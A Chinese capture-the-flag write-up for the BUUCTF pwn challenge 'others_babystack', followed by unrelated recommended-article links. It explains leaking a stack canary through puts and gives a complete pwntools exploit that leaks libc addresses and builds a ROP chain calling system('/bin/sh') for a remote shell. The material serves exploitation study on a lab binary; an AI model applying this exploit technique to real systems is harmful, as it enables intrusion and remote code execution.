一道泄露canary+rop常规的题。

  这道题让我学习到了,原来canary的最后一位是\x00,又因为是小端存储,所以在内存中我位置是在开头的。

  来,下载文件检查一下保护。

  

  开启了canary和nx保护,ida看一眼伪c代码。

  

  一个菜单类型的题,大概就是1是存储数据,2是输出数据,3是退出。puts函数输出是遇到\x00才停止输出,那么我们如果能够把canary的截断符覆盖,再输出,就会连canary输出来了,成功泄露了canary。接下来就是rop的常规操作了。这里我还犹豫泄露libc版本的时候需要返回跳到main函数,需不需要再泄露一次canary,后来发现canary的值没有变,这样我们就不用再费事了。贴一下exp啦!

  

 1 from pwn import *

 2 import  time

 3

 4 #p = process('./babystack')

 5 p = remote('node3.buuoj.cn',27237)

 6 elf = ELF('./babystack')

 7 context.log_level = 'debug'

 8

 9 p.sendlineafter('> ','1')

10 p.sendline('a'*0x88)

11 p.sendlineafter('> ','2')

12 p.recvuntil('aaaa\n')

13 canary = u64(p.recv(7).rjust(8,'\x00'))

14 print 'canary-->' + hex(canary)

15 #leak canary

16

17 pop_rdi = 0x0400a93

18 puts_plt = elf.plt['puts']

19 puts_got = elf.got['puts']

20 main_addr = 0x0400908

21 p.sendlineafter('> ','1')

22 payload = 'a'*0x88 + p64(canary) + 'bbbbbbbb' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

23 p.sendline(payload)

24 p.recv()

25 p.sendlineafter('> ','3')

26 puts_addr = u64(p.recv(6).ljust(8,'\x00'))

27 print 'puts_addr-->' + hex(puts_addr)

28 #leak libc

29

30 sleep(1)

31 base_addr = puts_addr - 0x06f690

32 system_addr= base_addr + 0x045390

33 binsh_addr = base_addr + 0x18cd57

34 p.sendline('1')

35 payload = 'a'*0x88 + p64(canary) + 'bbbbbbbb' + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)

36 p.sendline(payload)

37 sleep(1)

38 p.sendlineafter('> ','3')

39 p.interactive()

40 p.close()

41 #getshell

others_babystack的更多相关文章

  1. [BUUCTF]PWN——others_babystack

    others_babystack 附件 步骤: 例行检查,64位程序,开了挺多保护 本地试运行一下程序 64位ida载入,看main函数 1是read函数,存在栈溢出:2是puts函数,3退出 利用思 ...

随机推荐

  1. [luogu1526]智破连环阵

    (以下在描述复杂度时,认为$n$和$m$相同,因此一律使用$n$) 称第$i$个炸弹能匹配非空区间$[l,r]$,当且仅当$l$到$r$内所有武器都在$i$攻击范围内,且$r=m$或第$r+1$个武器 ...

  2. 花了30天才肝出来,史上最全面Java设计模式总结,看完再也不会忘

    本文所有内容均节选自<设计模式就该这样学> 序言 Design Patterns: Elements of Reusable Object-Oriented Software(以下简称&l ...

  3. 模数不超过 long long 范围时的快速乘

    笔者的话:使用前请确保评测系统的long double严格为16B ! 模数不在 int 范围内的乘法在 OI 中运用广泛,例如Millar-Rabin,Pollard-Rho等等.这样的乘法,直接乘 ...

  4. P7416 [USACO21FEB] No Time to Dry P

    题目传送门 题意简述:给出颜色序列 \(a\),多次询问给出 \(l,r\),求涂成 \(a_l,a_{l+1},\cdots,a_r\) 的最小操作次数.每次涂色只能用一段数值更大的颜色覆盖原有的颜 ...

  5. 如何使用scp在Linux服务器的后台传输文件?

    目录 一.上传 常规操作 建议 后台运行 二.下载 两台服务器间文件如何传输?对于小文件,可以先从Linux服务器传到window,再传到另一台服务器.对于大的文件,如测序数据.比对文件等.这样的方法 ...

  6. Nginx编译安装相关参数

    Nginx编译安装相关参数 Nginx插件安装 ------------------pcre------------------ cd /usr/local/source wget http://ww ...

  7. Docker Error response from daemon,Docker 换镜像

    Docker换镜像,Docker  pull.Docker search 失败出现以下错误 Error response from daemon: Get https://index.docker.i ...

  8. KEGG通路图应该怎么看(转载)

    转载:http://www.omicshare.com/forum/thread-107-1-3219.html (出处: OmicShare Forum) 不管是RNA-seq的分析数据,还是蛋白组 ...

  9. hadoop/spark面试题

    总结于网络 转自:https://www.cnblogs.com/jchubby/p/5449379.html 1.简答说一下hadoop的map-reduce编程模型 首先map task会从本地文 ...

  10. eclipse上点击open Perspective找不到java EE的解决办法

    原因:没有安装java ee等插件 Help--->Install New software---->work  with中选择All Available  Sites---->  ...